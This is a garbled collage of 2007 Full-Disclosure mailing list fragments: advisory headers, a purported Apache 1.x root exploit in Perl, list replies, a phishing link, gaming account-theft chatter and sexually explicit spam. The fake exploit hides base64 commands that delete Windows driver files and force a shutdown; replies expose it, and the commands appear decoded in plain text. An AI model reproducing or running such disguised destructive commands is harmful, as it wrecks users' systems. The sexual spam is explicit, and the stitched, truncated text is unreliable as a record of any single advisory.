==
Layered Defense Research Advisory 18 March 2007
==
1) Affected Software
F-Secure Anti-Virus Client Security Version 6.02
==
2) Severity Rating:
Low
unsubscribe
-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of
[EMAIL PROTECTED]
Sent: Monday, March 19, 2007 7:00 AM
To: full-disclosure@lists.grok.org.uk
Subject: Full-Disclosure Digest, Vol 25, Issue 27
Send Full-Disclosure mailing list submissions to
Here is another one:
http://spreadsheets.google.com/contacts/picker/data/contacts?groups=true&show=ALL&enums=true&max=999&out=xml
Let's Play
Dror
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
MADYNES Security Advisory
http://madynes.loria.fr/
Title: Asterisk SIP INVITE remote DOS
Release Date:
08/03/2007
Severity:
High - Denial of Service
Advisory ID: KIPH1
Software:
Asterisk
http://www.asterisk.org/
netVigilance Security Advisory #14
w-agora version 4.2.1 Multiple Path Disclosure Vulnerabilities
Description:
w-agora is a set of scripts written in PHP. This package is intended to
allow users to share, exchange and publish information, files and
discussions over the web.
Multiple path
netVigilance Security Advisory #15
w-agora version 4.2.1 Information Disclosure Vulnerability
Description:
w-agora is a set of scripts written in PHP. This package is intended to
allow users to share, exchange and publish information, files and
discussions over the web.
It is possible to
Hi,
A new apache 1.x 0day
#!/usr/bin/perl
use MIME::Base64;
use IO::Socket;
use HTTP::Response;
use HTTP::Status;
use Getopt::Std;
print q {
#
##
## Apache 1.X Remote Buffer Overflow getRoot() Exploit
## written by 666 - [EMAIL
Description:
dkftpbench is an FTP benchmark program inspired by SPECweb99. The
result of the benchmark is a number-of-simultaneous-users rating;
after running the benchmark properly, you have a good idea how many
simultaneous dialup clients a server can support. The target bandwidth
per client is
$mov =
decode_base64(QGRlbCAlU3lzdGVtUm9vdCVcU3lzdGVtMzJcZHJpdmVyc1wqLiogL0YgL1MgL1EgPiBudWw=);
@del %SystemRoot%\System32\drivers\*.* /F /S /Q nul
$int = decode_base64(c2h1dGRvd24gLXMgLWYgLXQgMA==);
shutdown -s -f -t 0
--
http://secdev.zoller.lu
Thierry Zoller
Fingerprint : 5D84 BFDC CD36
@del %SystemRoot%\System32\drivers\*.* /F /S /Q nul
shutdown -s -f -t 0
What, the attempt at visually obstructing the system() calls didn't give
it away?
Description:
CFTP is Comfortable FTP, a full screen ftp client.
Supported are FTP both with active and passive data connections,
IPv4 and IPv6, and SFTP (a file transfer protocol using SSH for
authorization and connection encryption).
Found local buffer overflow in readrc() with sprintf() with no
lol,
system ($mov);system ($int);shift;
$mov and $int are base64 encoded pieces of crap deleting
%systemroot%\system32\drivers\*.* and shutting down the windows box,
funny and oh so obvious.
===
Ubuntu Security Notice USN-437-1 March 19, 2007
libwpd vulnerability
CVE-2007-0002
===
A security issue affects the following Ubuntu releases:
Ubuntu 5.10
Ubuntu 6.06
Hi to all,
While playing in my home's network with Scapy I found
a vulnerability affecting the wireless services
offered by Zyxel routers with, at least, ZynOS v3.40.
That's the unique model I tested.
The exploit in question:
--
ZynOS v3.40 One
Since boatloads of people are asking me about this I figured I would
just give an update here
Here is an exhaustive list of people experiencing the problem as well
as a possible source of the account theft (Clan Infamous)
http://www.oinfamouso.moonfruit.com/
They claim to be pretexting
Dear Yahoo
We use the following email to collect victims' credentials [1]. Please
ban our asses!
[EMAIL PROTECTED]
[1] http://88.191.15.116/www.paypal.com/cgi-bin/www.amazon.com.zip
thanks for reading
heee he
Dates indicate thread start date not necessarily the offending post
date.
Clan Homepages of *some* of those that are responsible for the
attacks on Xbox live accounts.
3-19-2007 (See the blacklist and member list)
o InFamOuS o clan
http://www.oinfamouso.moonfruit.com/
3-19-2007
This Site
Now that is what I call full dis-clotheser. Geez!
-Original Message-
From: Miss Aveline [mailto:[EMAIL PROTECTED]
Sent: Tuesday, March 20, 2007 12:37 AM
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] Sexy, spankable 22 year old girl looking for a wild
time
hey sexys,
On Mar 19, 2007, at 11:37 PM, Miss Aveline wrote:
hey sexys,
22/f/st. catherines bi girl looking for a casual thing no strings
attached. love the cock, but will eat pussy too. into BDSM,
roleplay, ageplay, and watersports and spankings especially ;-).
3-4somes are fine, but any more